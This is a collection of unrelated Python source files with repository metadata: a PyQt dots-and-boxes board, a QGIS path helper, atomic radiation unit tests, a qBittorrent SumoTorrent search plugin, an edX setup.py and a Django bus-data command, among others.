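    # horizontal edges. The predicates below test positions within that scheme;
    # e.g. with n = 6, is_horizontal(12) is True because 12 % 11 = 1 < 5.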
def is_horizontal(self, i):
"""
"""
return (i % (2*self.n-1)) < self.n-1
def is_vertical(self, i):
"""
"""
return not self.is_horizontal(i)
def right_border(self, i):
"""
"""
if self.is_horizontal(i):
return False
else:
return ((i+1) % (2*self.n-1)) == 0
def left_border(self, i):
"""
"""
return self.right_border(i+self.n-1)
def top_border(self, i):
"""
"""
return i >= 0 and i < self.n-1
def bottom_border(self, i):
"""
"""
return i > (2*self.n*(self.n-1))-self.n and i < 2*self.n*(self.n-1)
def up_square(self, i):
"""
"""
if self.top_border(i) or self.is_vertical(i):
return False
else:
return self.lines[i-self.n] and self.lines[i+1-self.n] and self.lines[i-(2*self.n-1)]
def down_square(self, i):
"""
"""
if self.bottom_border(i) or self.is_vertical(i):
return False
else:
return self.lines[i+self.n] and self.lines[i-1+self.n] and self.lines[i+(2*self.n-1)]
def left_square(self, i):
"""
"""
if self.left_border(i) or self.is_horizontal(i):
return False
else:
return self.lines[i-self.n] and self.lines[i-1] and self.lines[i+self.n-1]
def right_square(self, i):
"""
"""
if self.right_border(i) or self.is_horizontal(i):
return False
else:
return self.lines[i+self.n] and self.lines[i+1-self.n] and self.lines[i+1]
def mark_number(self, r):
c = 2*self.n-1
a = r/c
b = (r-self.n) % c
return a + b*(self.n-1)
def init_board(self):
"""
"""
# Set background
bgItem = QtGui.QGraphicsPixmapItem()
bg = QtGui.QPixmap(":/board/bg")
bgItem.setPixmap(bg)
bgItem.setZValue(2)
self.scene.addItem(bgItem)
# Add horiontal lines and selection region as invisible
i = 0
j = 0
for line_pos in Board.hline_poses:
line_item = HLineItem(line_pos)
line_item.setZValue(1)
self.scene.addItem(line_item)
self.line_map[line_pos] = j
x, y = line_pos
rect = HRectItem(x+5, y-5)
rect.setZValue(0)
self.scene.addItem(rect)
self.line_items[j] = (line_item, rect)
if j >= 55:
i += 1
j = i
else:
j += 11
# Add vertical lines and selection region as invisible
i = 5
j = 5
for line_pos in Board.vline_poses:
line_item = VLineItem(line_pos)
line_item.setZValue(1)
self.scene.addItem(line_item)
self.line_map[line_pos] = j
x, y = line_pos
rect = VRectItem(x-5, y+5)
rect.setZValue(0)
self.scene.addItem(rect)
self.line_items[j] = (line_item, rect)
if j >= 49:
i += 1
j = i
else:
j += 11
class DnbScene(QtGui.QGraphicsScene):
def __init__(self, *args):
"""
"""
super(DnbScene, self).__init__(*args)
def addItem(self, item):
"""
"""
if isinstance(item, RectItem):
item.obj.drawn.connect(self.remove_rect)
item.obj.line_added.connect(self.line_added_slot)
super(DnbScene, self).addItem(item)
# Signals
line_added = QtCore.pyqtSignal('QPointF', bool)
# Slots
@QtCore.pyqtSlot('QPointF')
def line_added_slot(self, p):
self.line_added.emit(p, True)
@QtCore.pyqtSlot('QGraphicsPixmapItem')
def remove_rect(self, ritem):
"""
"""
pass #self.removeItem(ritem)
class RectObj(QtCore.QObject):
def __init__(self):
super(RectObj, self).__init__()
def emit(self, pixmap, point):
self.drawn.emit(pixmap)
self.line_added.emit(point)
# Signal
drawn = QtCore.pyqtSignal('QGraphicsPixmapItem')
line_added = QtCore.pyqtSignal('QPointF')
class RectItem(QtGui.QGraphicsPixmapItem):
def __init__(self, x, y):
super(RectItem, self).__init__()
self.obj = RectObj()
self.setPos(x, y)
def mouseDoubleClickEvent(self, event):
items = self.collidingItems()
hline = items[1]
hline.setZValue(3)
self.obj.emit(self, hline.pos())
class VRectItem(RectItem):
def __init__(self, x, y):
super(VRectItem, self).__init__(x, y)
self.setPixmap(QtGui.QPixmap(':/board/vrect'))
class HRectItem(RectItem):
def __init__(self, x, y):
super(HRectItem, self).__init__(x, y)
self.setPixmap(QtGui.QPixmap(':/board/hrect'))
class LineItem(QtGui.QGraphicsPixmapItem):
def __init__(self, pos):
"""
"""
super(LineItem, self).__init__()
self.setPos(pos[0], pos[1])
class HLineItem(LineItem):
def __init__(self, pos):
"""
"""
super(HLineItem, self).__init__(pos)
self.setPixmap(QtGui.QPixmap(":/board/hline"))
class VLineItem(LineItem):
def __init__(self, pos):
"""
"""
super(VLineItem, self).__init__(pos)
self.setPixmap(QtGui.QPixmap(":/board/vline"))
| dirtybit/pyDnb | ui/board.py | Python | gpl-2.0 | 13,881 |
#!/usr/bin/env python2.7
# Copyright 2015 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
''' Sample usage of function 'inventory_not_connected' to show which devices are mounted, but not connected.
Print the function's documentation then invoke the function and print the output.
'''
from __future__ import print_function as _print_function
from basics.inventory import inventory_not_connected
from basics.render import print_table
from pydoc import render_doc as doc
from pydoc import plain
def main():
print(plain(doc(inventory_not_connected)))
print("inventory_not_connected()")
print_table(inventory_not_connected(), headers='device-name')
if __name__ == "__main__":
main() | tbarrongh/cosc-learning-labs | src/learning_lab/01_inventory_not_connected.py | Python | apache-2.0 | 1,219 |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
__author__ = "Karolina Alexiou"
__email__ = "[email protected]"
import platform
import os
LINUX = "linux"
MACOS = "macos"
WINDOWS = "windows"
# TODO have people confirm the prefix path for Mac
# TODO Make it possible to test against a list of paths
# (Qt + unittest has some issues when looping over paths and re-initializing, unfortunately)
os_prefix_paths = {LINUX: "/usr", MACOS: "/Applications/QGIS.app/Contents",
WINDOWS: "C:/PROGRA~1/QGISBR~1/apps/qgis"}
def get_os(): # pragma: no cover
"""Determine OS"""
# details of platform implementation
# https://hg.python.org/cpython/file/2.7/Lib/platform.py#l1568
if "linux" in platform.platform().lower():
return LINUX
elif "macos" in platform.platform().lower() or "darwin" in platform.platform().lower():
return MACOS
elif "windows" in platform.platform().lower():
return WINDOWS
else:
raise Exception("OS not found")
def get_possible_prefix_path(): # pragma: no cover
# ideally the dev environment has set a "QGIS_PREFIX_PATH"
if os.getenv("QGIS_PREFIX_PATH", None) is not None:
return os.getenv("QGIS_PREFIX_PATH")
elif os.getenv("PREFIX_PATH", None) is not None:
return os.getenv("PREFIX_PATH")
else: # raw guessing
return os_prefix_paths[get_os()]
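# --- Editor's sketch (hedged): not part of the original module. ---
# The guessed prefix path is typically handed to QgsApplication when running
# PyQGIS outside the QGIS GUI; the standalone-initialisation calls below are
# standard PyQGIS API, but this block is illustrative only.
if __name__ == "__main__":  # pragma: no cover
    from qgis.core import QgsApplication
    prefix = get_possible_prefix_path()
    QgsApplication.setPrefixPath(prefix, True)
    app = QgsApplication([], False)   # no GUI
    app.initQgis()
    print("QGIS initialised with prefix path: {}".format(prefix))
    app.exitQgis()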
| anitagraser/TimeManager | utils/os_util.py | Python | gpl-2.0 | 1,389 |
import unittest
import atomic
import numpy as np
class TestRadiation(unittest.TestCase):
def setUp(self):
ad1 = atomic.element('carbon')
ad2 = atomic.element('li')
eq1 = atomic.CollRadEquilibrium(ad1)
eq2 = atomic.CollRadEquilibrium(ad2)
te = np.logspace(0, 3, 50)
ne = 1e19
self.y1 = eq1.ionisation_stage_distribution(te, ne)
self.y2 = eq2.ionisation_stage_distribution(te, ne)
# The tests of get_impurity_density and get_neutral_density could
# be rewritten more as unit tests, by mocking up a y.
def test_get_impurity_density_finite(self):
rad = atomic.Radiation(self.y1, impurity_fraction=0.1)
expected = 1e18
result = rad.get_impurity_density()
self.assertEqual(expected, result)
def test_get_impurity_density_finite2(self):
"""There are 10 times as many impurities as main ions."""
rad = atomic.Radiation(self.y1, impurity_fraction=10)
expected = 1e20
result = rad.get_impurity_density()
self.assertEqual(expected, result)
def test_get_impurity_density_default_1(self):
rad = atomic.Radiation(self.y1)
expected = 1e19
result = rad.get_impurity_density()
self.assertEqual(expected, result)
def test_get_impurity_density_zero(self):
rad = atomic.Radiation(self.y1, impurity_fraction=0)
expected = 0
result = rad.get_impurity_density()
self.assertEqual(expected, result)
def test_get_neutral_density(self):
rad = atomic.Radiation(self.y1, neutral_fraction=1e-2)
expected = 1e17
result = rad.get_neutral_density()
self.assertEqual(expected, result)
def test_get_neutral_density_default_zero(self):
rad = atomic.Radiation(self.y1)
expected = 0.
result = rad.get_neutral_density()
self.assertEqual(expected, result)
@unittest.skip("")
def test_power(self):
rad = atomic.Radiation(self.y1)
power = rad.power
@unittest.skip("")
def test_specific_power(self):
# radiation = Radiation(ionisation_stage_distribution, impurity_fraction, neutral_fraction)
# self.assertEqual(expected, radiation.specific_power())
assert False # TODO: implement your test here
if __name__ == '__main__':
unittest.main()
| ezekial4/atomic_neu | atomic/tests/test_radiation.py | Python | mit | 2,367 |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
PCI functionality.
"""
from . import device
class PciBus(device.Driver):
driver = "pci-bus"
def create(self, **kwargs):
return super(PciBus, self).create(
cmdline="pci=conf1",
**kwargs)
class PciHostBridge(device.Driver):
# NOTE: For now, PCI support is pretty sketchy.
# Generally, we'll need to have a hostbridge appear
# in the list of devices.
# For information on the bridge that might normally
# appear, see src/novmm/machine/pcihost.go.
driver = "pci-hostbridge"
device.Driver.register(PciBus)
device.Driver.register(PciHostBridge)
| nathanaelle/novm | novm/pci.py | Python | apache-2.0 | 1,210 |
#VERSION: 1.60
#AUTHORS: Diego de las Heras ([email protected])
# Christophe Dumez ([email protected])
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author nor the names of its contributors may be
# used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
try:
#python3
from html.parser import HTMLParser
from urllib.parse import quote, urlencode
import http.client as httplib
except ImportError:
#python2
from HTMLParser import HTMLParser
from urllib import quote, urlencode
import httplib
#qBt
from novaprinter import prettyPrinter
from helpers import retrieve_url, download_file
class sumotorrent(object):
url = 'http://www.sumotorrent.sx'
name = 'SumoTorrent'
supported_categories = {'all': '', 'movies': '4', 'tv': '9', 'music': '0', 'games': '2', 'anime': '8', 'software': '1'}
trackers_list = ['udp://tracker.coppersurfer.tk:6969/announce',
'udp://tracker.open-internet.nl:6969/announce',
'udp://exodus.desync.com:6969/announce',
'udp://tracker.internetwarriors.net:1337/announce',
'udp://9.rarbg.com:2710/announce',
'udp://tracker.opentrackr.org:1337/announce']
trackers = '&' + '&'.join(urlencode({'tr' : tracker}) for tracker in trackers_list)
def download_torrent(self, download_link):
# we need to follow the redirect to get the magnet link
conn = httplib.HTTPConnection(self.url[7:])
conn.request("GET", download_link.replace(self.url, ''))
response = conn.getresponse()
if response.status == 302:
redirection_target = response.getheader('Location')
print(redirection_target + self.trackers + " " + download_link)
else:
            raise Exception('Error, please file a bug report!')
class MyHtmlParser(HTMLParser):
def __init__(self, results, url, *args):
HTMLParser.__init__(self)
self.url = url
self.td_counter = None
self.current_item = None
self.results = results
def handle_starttag(self, tag, attrs):
params = dict(attrs)
if tag == 'a' and 'href' in params:
if 'en/details/' in params['href'] and (self.td_counter is None or self.td_counter > 5):
self.current_item = {}
self.td_counter = 0
self.current_item['desc_link'] = params['href']
elif params['href'].startswith('http://torrents.sumotorrent.sx/download/'):
parts = params['href'].strip().split('/')
self.current_item['link'] = self.url + '/torrent_download/'+parts[-3]+'/'+parts[-2]+'/'+quote(parts[-1]).replace('%20', '+')
elif tag == 'td' and isinstance(self.td_counter,int):
self.td_counter += 1
if self.td_counter > 6:
# Display item
self.td_counter = None
self.current_item['engine_url'] = self.url
if not self.current_item['seeds'].isdigit():
self.current_item['seeds'] = 0
if not self.current_item['leech'].isdigit():
self.current_item['leech'] = 0
self.current_item['name'] = self.current_item['name'].strip()
try: #python2
self.current_item['name'] = self.current_item['name'].decode('utf8')
except:
pass
prettyPrinter(self.current_item)
self.results.append('a')
def handle_data(self, data):
if self.td_counter == 0:
if 'name' not in self.current_item:
self.current_item['name'] = ''
self.current_item['name'] += data
elif self.td_counter == 3:
if 'size' not in self.current_item:
self.current_item['size'] = ''
self.current_item['size'] += data.strip()
elif self.td_counter == 4:
if 'seeds' not in self.current_item:
self.current_item['seeds'] = ''
self.current_item['seeds'] += data.strip()
elif self.td_counter == 5:
if 'leech' not in self.current_item:
self.current_item['leech'] = ''
self.current_item['leech'] += data.strip()
def search(self, what, cat='all'):
results_list = []
parser = self.MyHtmlParser(results_list, self.url)
i = 0
while i < 6:
dat = retrieve_url(self.url+'/searchResult.php?search=%s&lngMainCat=%s&order=seeders&by=down&start=%d'%(what, self.supported_categories[cat], i))
parser.feed(dat)
if len(results_list) < 1:
break
del results_list[:]
i += 1
parser.close()
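# --- Editor's sketch (hedged): not part of the original plugin. ---
# qBittorrent's nova2 search framework instantiates the engine class and calls
# search(what, cat) with an already URL-encoded query; roughly equivalent to:
if __name__ == "__main__":
    engine = sumotorrent()
    engine.search('ubuntu', cat='software')  # prettyPrinter() emits one line per result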
| ngosang/qBittorrent-plugins | sumotorrent/sumotorrent.py | Python | gpl-2.0 | 6,341 |
from setuptools import setup, find_packages
XMODULES = [
"abtest = xmodule.abtest_module:ABTestDescriptor",
"book = xmodule.backcompat_module:TranslateCustomTagDescriptor",
"chapter = xmodule.seq_module:SequenceDescriptor",
"combinedopenended = xmodule.combined_open_ended_module:CombinedOpenEndedDescriptor",
"conditional = xmodule.conditional_module:ConditionalDescriptor",
"course = xmodule.course_module:CourseDescriptor",
"customtag = xmodule.template_module:CustomTagDescriptor",
"discuss = xmodule.backcompat_module:TranslateCustomTagDescriptor",
"html = xmodule.html_module:HtmlDescriptor",
"image = xmodule.backcompat_module:TranslateCustomTagDescriptor",
"error = xmodule.error_module:ErrorDescriptor",
"peergrading = xmodule.peer_grading_module:PeerGradingDescriptor",
"poll_question = xmodule.poll_module:PollDescriptor",
"problem = xmodule.capa_module:CapaDescriptor",
"problemset = xmodule.seq_module:SequenceDescriptor",
"randomize = xmodule.randomize_module:RandomizeDescriptor",
"section = xmodule.backcompat_module:SemanticSectionDescriptor",
"sequential = xmodule.seq_module:SequenceDescriptor",
"slides = xmodule.backcompat_module:TranslateCustomTagDescriptor",
"vertical = xmodule.vertical_module:VerticalDescriptor",
"video = xmodule.video_module:VideoDescriptor",
"videoalpha = xmodule.video_module:VideoDescriptor",
"videodev = xmodule.backcompat_module:TranslateCustomTagDescriptor",
"videosequence = xmodule.seq_module:SequenceDescriptor",
"discussion = xmodule.discussion_module:DiscussionDescriptor",
"course_info = xmodule.html_module:CourseInfoDescriptor",
"static_tab = xmodule.html_module:StaticTabDescriptor",
"custom_tag_template = xmodule.raw_module:RawDescriptor",
"about = xmodule.html_module:AboutDescriptor",
"wrapper = xmodule.wrapper_module:WrapperDescriptor",
"graphical_slider_tool = xmodule.gst_module:GraphicalSliderToolDescriptor",
"annotatable = xmodule.annotatable_module:AnnotatableDescriptor",
"textannotation = xmodule.textannotation_module:TextAnnotationDescriptor",
"videoannotation = xmodule.videoannotation_module:VideoAnnotationDescriptor",
"foldit = xmodule.foldit_module:FolditDescriptor",
"word_cloud = xmodule.word_cloud_module:WordCloudDescriptor",
"hidden = xmodule.hidden_module:HiddenDescriptor",
"raw = xmodule.raw_module:RawDescriptor",
"crowdsource_hinter = xmodule.crowdsource_hinter:CrowdsourceHinterDescriptor",
"lti = xmodule.lti_module:LTIDescriptor",
]
setup(
name="XModule",
version="0.1",
packages=find_packages(exclude=["tests"]),
install_requires=[
'distribute',
'docopt',
'capa',
'path.py',
'webob',
],
package_data={
'xmodule': ['js/module/*'],
},
# See http://guide.python-distribute.org/creation.html#entry-points
# for a description of entry_points
entry_points={
'xblock.v1': XMODULES,
'xmodule.v1': XMODULES,
'console_scripts': [
'xmodule_assets = xmodule.static_content:main',
],
},
)
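# --- Editor's note (hedged illustration, not part of the original file). ---
# At runtime the entry points declared above are typically discovered through
# setuptools' pkg_resources API, roughly like this:
#
#     import pkg_resources
#     for ep in pkg_resources.iter_entry_points('xblock.v1'):
#         descriptor_class = ep.load()   # e.g. xmodule.capa_module:CapaDescriptor
#
# The loop is only a sketch of how the XMODULES mapping gets consumed.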
| pku9104038/edx-platform | common/lib/xmodule/setup.py | Python | agpl-3.0 | 3,169 |
import requests
from django.core.management.base import BaseCommand
from time import sleep
from busstops.models import Service
from .import_transxchange import get_open_data_operators
class Command(BaseCommand):
@staticmethod
def add_arguments(parser):
parser.add_argument('api_key', type=str)
def handle(self, api_key, **options):
assert len(api_key) == 40
open_data_operators, incomplete_operators = get_open_data_operators()
session = requests.Session()
url = 'https://data.bus-data.dft.gov.uk/api/v1/dataset/'
params = {
'api_key': api_key,
'status': ['published', 'expiring'],
'limit': 100
}
while url:
response = session.get(url, params=params)
print(response.url)
data = response.json()
for item in data['results']:
if Service.objects.filter(operator__in=item['noc'], current=True).exists():
continue
if any(noc in open_data_operators for noc in item['noc']):
continue
print(item['name'])
print(' ', item['noc'])
print(' ', item['description'])
print(' ', item['comment'])
print(' ', item['adminAreas'])
print(' ', item['url'])
url = data['next']
params = None
if url:
sleep(1)
| jclgoodwin/bustimes.org.uk | bustimes/management/commands/suggest_bod.py | Python | mpl-2.0 | 1,471 |